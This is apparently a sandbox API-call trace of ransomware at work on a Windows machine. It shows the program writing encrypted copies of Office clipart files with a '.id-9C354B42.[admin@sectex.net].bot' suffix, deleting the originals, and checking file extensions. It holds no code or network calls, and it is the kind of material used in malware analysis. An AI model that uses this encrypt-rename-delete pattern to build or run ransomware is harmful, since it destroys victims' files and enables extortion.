	[0168.626] WriteFile (in: hFile=0x25c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.626] SetEndOfFile (hFile=0x25c) returned 1
	[0168.626] CloseHandle (hObject=0x25c) returned 1
	[0168.626] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.626] SetEndOfFile (hFile=0x3a4) returned 1
	[0168.628] CloseHandle (hObject=0x3a4) returned 1
	[0168.628] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.659] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152602.wmf")) returned 1
	[0168.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.660] lstrlenW (lpString=".doc") returned 4
	[0168.660] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.660] lstrlenW (lpString=".docx") returned 5
	[0168.660] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0168.660] lstrlenW (lpString=".pdf") returned 4
	[0168.660] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.660] lstrlenW (lpString=".xls") returned 4
	[0168.660] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.660] lstrlenW (lpString=".xlsx") returned 5
	[0168.660] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0168.660] lstrlenW (lpString=".ppt") returned 4
	[0168.660] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.660] lstrlenW (lpString=".zip") returned 4
	[0168.660] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.660] lstrlenW (lpString=".rar") returned 4
	[0168.660] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.660] lstrlenW (lpString=".bz2") returned 4
	[0168.660] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.660] lstrlenW (lpString=".7z") returned 3
	[0168.660] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.660] lstrlenW (lpString=".dbf") returned 4
	[0168.660] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.660] lstrlenW (lpString=".1cd") returned 4
	[0168.660] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.660] lstrlenW (lpString=".jpg") returned 4
	[0168.660] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.661] lstrlenW (lpString=".doc") returned 4
	[0168.661] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.661] lstrlenW (lpString=".docx") returned 5
	[0168.661] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0168.661] lstrlenW (lpString=".pdf") returned 4
	[0168.661] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.661] lstrlenW (lpString=".xls") returned 4
	[0168.661] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.661] lstrlenW (lpString=".xlsx") returned 5
	[0168.661] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0168.661] lstrlenW (lpString=".ppt") returned 4
	[0168.661] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.661] lstrlenW (lpString=".zip") returned 4
	[0168.661] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.661] lstrlenW (lpString=".rar") returned 4
	[0168.661] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.661] lstrlenW (lpString=".bz2") returned 4
	[0168.661] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.661] lstrlenW (lpString=".7z") returned 3
	[0168.661] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.661] lstrlenW (lpString=".dbf") returned 4
	[0168.661] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.661] lstrlenW (lpString=".1cd") returned 4
	[0168.661] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 63
	[0168.661] lstrlenW (lpString=".jpg") returned 4
	[0168.661] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.661] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0168.662] lstrlenW (lpString="J0152610.WMF") returned 12
	[0168.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0168.662] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=5960) returned 1
	[0168.662] CloseHandle (hObject=0x3b8) returned 1
	[0168.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf")) returned 0x20
	[0168.662] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0168.663] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.663] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0168.663] GetLastError () returned 0x0
	[0168.663] ReadFile (in: hFile=0x3b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1748, lpOverlapped=0x0) returned 1
	[0168.687] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1750, lpOverlapped=0x0) returned 1
	[0168.688] ReadFile (in: hFile=0x3b8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.688] WriteFile (in: hFile=0x398, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.688] SetEndOfFile (hFile=0x398) returned 1
	[0168.688] CloseHandle (hObject=0x398) returned 1
	[0168.689] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.689] SetEndOfFile (hFile=0x3b8) returned 1
	[0168.691] CloseHandle (hObject=0x3b8) returned 1
	[0168.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.691] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152610.wmf")) returned 1
	[0168.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.692] lstrlenW (lpString=".doc") returned 4
	[0168.692] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.692] lstrlenW (lpString=".docx") returned 5
	[0168.692] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0168.692] lstrlenW (lpString=".pdf") returned 4
	[0168.692] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.692] lstrlenW (lpString=".xls") returned 4
	[0168.692] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.692] lstrlenW (lpString=".xlsx") returned 5
	[0168.692] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0168.692] lstrlenW (lpString=".ppt") returned 4
	[0168.692] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.692] lstrlenW (lpString=".zip") returned 4
	[0168.692] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.693] lstrlenW (lpString=".rar") returned 4
	[0168.693] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.693] lstrlenW (lpString=".bz2") returned 4
	[0168.693] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.693] lstrlenW (lpString=".7z") returned 3
	[0168.693] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.693] lstrlenW (lpString=".dbf") returned 4
	[0168.693] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.693] lstrlenW (lpString=".1cd") returned 4
	[0168.693] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.693] lstrlenW (lpString=".jpg") returned 4
	[0168.693] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.693] lstrlenW (lpString=".doc") returned 4
	[0168.693] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.693] lstrlenW (lpString=".docx") returned 5
	[0168.693] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0168.693] lstrlenW (lpString=".pdf") returned 4
	[0168.693] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.693] lstrlenW (lpString=".xls") returned 4
	[0168.693] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.693] lstrlenW (lpString=".xlsx") returned 5
	[0168.693] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0168.693] lstrlenW (lpString=".ppt") returned 4
	[0168.693] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.693] lstrlenW (lpString=".zip") returned 4
	[0168.693] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.693] lstrlenW (lpString=".rar") returned 4
	[0168.694] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.694] lstrlenW (lpString=".bz2") returned 4
	[0168.694] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.694] lstrlenW (lpString=".7z") returned 3
	[0168.694] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.694] lstrlenW (lpString=".dbf") returned 4
	[0168.694] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.694] lstrlenW (lpString=".1cd") returned 4
	[0168.694] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 63
	[0168.694] lstrlenW (lpString=".jpg") returned 4
	[0168.694] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.694] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0168.694] lstrlenW (lpString="J0152626.WMF") returned 12
	[0168.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0168.704] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=26248) returned 1
	[0168.704] CloseHandle (hObject=0x3a8) returned 1
	[0168.704] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf")) returned 0x20
	[0168.711] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0168.712] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.712] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0168.712] GetLastError () returned 0x0
	[0168.712] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x6688, lpOverlapped=0x0) returned 1
	[0168.974] WriteFile (in: hFile=0x388, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x6690, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x6690, lpOverlapped=0x0) returned 1
	[0168.975] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.975] WriteFile (in: hFile=0x388, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.975] SetEndOfFile (hFile=0x388) returned 1
	[0168.975] CloseHandle (hObject=0x388) returned 1
	[0168.976] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.976] SetEndOfFile (hFile=0x3a8) returned 1
	[0168.978] CloseHandle (hObject=0x3a8) returned 1
	[0168.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152626.wmf")) returned 1
	[0168.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.980] lstrlenW (lpString=".doc") returned 4
	[0168.980] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.980] lstrlenW (lpString=".docx") returned 5
	[0168.980] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0168.980] lstrlenW (lpString=".pdf") returned 4
	[0168.980] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.980] lstrlenW (lpString=".xls") returned 4
	[0168.980] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.980] lstrlenW (lpString=".xlsx") returned 5
	[0168.980] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0168.980] lstrlenW (lpString=".ppt") returned 4
	[0168.980] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.980] lstrlenW (lpString=".zip") returned 4
	[0168.980] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.980] lstrlenW (lpString=".rar") returned 4
	[0168.980] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.980] lstrlenW (lpString=".bz2") returned 4
	[0168.980] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.980] lstrlenW (lpString=".7z") returned 3
	[0168.980] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.980] lstrlenW (lpString=".dbf") returned 4
	[0168.980] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.980] lstrlenW (lpString=".1cd") returned 4
	[0168.980] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.980] lstrlenW (lpString=".jpg") returned 4
	[0168.980] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.980] lstrlenW (lpString=".doc") returned 4
	[0168.981] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0168.981] lstrlenW (lpString=".docx") returned 5
	[0168.981] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0168.981] lstrlenW (lpString=".pdf") returned 4
	[0168.981] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0168.981] lstrlenW (lpString=".xls") returned 4
	[0168.981] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0168.981] lstrlenW (lpString=".xlsx") returned 5
	[0168.981] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0168.981] lstrlenW (lpString=".ppt") returned 4
	[0168.981] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0168.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.981] lstrlenW (lpString=".zip") returned 4
	[0168.981] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0168.981] lstrlenW (lpString=".rar") returned 4
	[0168.981] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0168.981] lstrlenW (lpString=".bz2") returned 4
	[0168.981] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0168.981] lstrlenW (lpString=".7z") returned 3
	[0168.981] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0168.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.981] lstrlenW (lpString=".dbf") returned 4
	[0168.981] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0168.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.981] lstrlenW (lpString=".1cd") returned 4
	[0168.981] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0168.981] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 63
	[0168.981] lstrlenW (lpString=".jpg") returned 4
	[0168.981] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0168.981] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0168.981] lstrlenW (lpString="J0152688.WMF") returned 12
	[0168.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0168.982] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=34676) returned 1
	[0168.982] CloseHandle (hObject=0x3a8) returned 1
	[0168.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf")) returned 0x20
	[0168.982] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0168.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0168.983] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.983] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0168.983] GetLastError () returned 0x0
	[0168.983] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x8774, lpOverlapped=0x0) returned 1
	[0169.019] WriteFile (in: hFile=0x388, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x8780, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x8780, lpOverlapped=0x0) returned 1
	[0169.021] ReadFile (in: hFile=0x3a8, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.021] WriteFile (in: hFile=0x388, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.021] SetEndOfFile (hFile=0x388) returned 1
	[0169.021] CloseHandle (hObject=0x388) returned 1
